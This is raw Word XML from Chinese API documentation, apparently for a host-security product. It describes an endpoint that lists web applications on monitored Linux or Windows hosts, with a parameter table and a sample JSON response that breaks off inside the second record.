    <w:p w14:paraId="70D052D0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0305EC54" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/webapp/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux|win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1548023F"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520"/>
        <w:gridCol w:w="1339"/>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="3746"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="569F261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68AF96B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C8F2FC7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C2897B8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C51510C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2BAEE303" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3284BCAF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2947633C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32B6D096" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A6CD187" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>唯一标识Agent的ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="671167AB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F47C20E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2EEC765E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4085C18D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="665F0A0C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="46D104ED" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21C2E7E2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D469DFF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="292811C3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="013E1C51" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2664465C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BB6C619" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DDA95C3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15B003CD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C8E9E86" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5A367AF7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FEBFC6E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B3FECF7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E7293DF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C9FD18A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>应用版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="28294DCD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77183BC8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>appName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77BA50A1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41B41CC3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35C02A73" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>应用名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="070CBD69" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="539A8B03" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>rootPath</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AD3CE40" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A9C571F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AC7336D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>根路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="776168FD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0ECB0C56" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>webRoot</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1EA4F2A5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38FD6EA5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D8A8D73" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>站点根路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6A6155CE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F05A79F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>serverName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46FC6663" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BF0C5E5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EE4CB8A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>服务类型，如nginx、</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>apache</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>、tomcat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3EDF4500" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3325B686" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>domainName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48D801BB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21C72E9D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7154020B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>域名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1666E526" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0471959C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/webapp/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="14853AFF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5634FA63" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total":1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "agentId":"fe107d9c77f4c77a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "displayIp":"192.168.78.131",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "connectionIp":"172.16.2.244",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>externalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "internalIp":"192.168.78.131",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroupId":41,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":"qingteng",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark":"12345",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostTagList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "联系",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "标签a"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname":"xdu-vm-cent51",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "version":"",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webRoot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":"/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/share/nginx/html/",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>serverName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":"nginx",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "domainName":"192.168.78.131",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "pluginCount":0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>appName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":"phpMyAdmin",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>description":"phpMyAdmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 是一个以PHP为基础，以Web-Base方式架构在网站主机上的MySQL的数据库管理工具，让管理者可用Web接口管理MySQL数据库。",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rootPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":"/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/share/nginx/html/phpMyAdmin",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>plugins":null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "agentId":"dbcf7ac1b5537764",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "displayIp":"192.168.126.203",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "connectionIp":"172.16.2.138",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>externalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "internalIp":"192.168.126.203",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroupId":41,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":"qingteng",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark":"安装了</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DNSmasq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostTagList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "标签a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "标签b"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname":"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>oldtcm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "version":"4.5.3",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webRoot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":"/var/www/html/",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>serverName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":"httpd",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>domainName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":"www.qingtengdemoapache.com",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "pluginCount":4,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>appName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":"WordPress",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>description":"WordPress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>是一种使用PHP语言开发</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>的博客平台</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>，用户可以在支持PHP和MySQL 数据库的服务器上架设自己的网志。",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rootPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":"/var/www/html/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wordpress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "plugins":[</w:t>
      </w:r>
      <w:r>
